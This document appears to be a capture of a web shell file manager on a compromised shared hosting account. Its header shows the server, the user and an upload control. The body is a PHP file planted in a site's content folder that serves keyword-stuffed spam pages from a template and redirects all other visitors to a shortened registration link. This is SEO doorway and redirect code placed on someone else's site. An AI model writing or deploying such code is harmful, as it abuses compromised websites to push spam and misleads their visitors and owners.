HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //proc/thread-self/root/proc/self/root/proc/self/root/home/vitanhod/vitamine.pk/content/index.php
<?php

if (!file_exists('newrun.html') || !is_readable('newrun.html')) {
    header("Location: https://bit.ly/TQ88-Register");
    exit;
}

$template = file_get_contents('newrun.html');
 
if (!file_exists('newcontent.txt') || !is_readable('newcontent.txt')) {
    header("Location: https://bit.ly/TQ88-Register");
    exit;
}

$keywords = file('newcontent.txt', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);

$givenKeyword = filter_input(INPUT_GET, 'page', FILTER_SANITIZE_STRING);
$givenKeyword = str_replace('-', ' ', strtolower($givenKeyword));

$index = array_search($givenKeyword, array_map('strtolower', $keywords));

if ($index === false) {
    header("Location: https://bit.ly/TQ88-Register");
    exit;
} else {
    $displayKeyword = ucwords($givenKeyword);
    $linkKeyword = str_replace(' ', '-', $givenKeyword);
    
    $output = str_replace('{keyword}', $displayKeyword, $template);
    $output = str_replace('{keywordLink}', $linkKeyword, $output);
    echo $output;
}

?>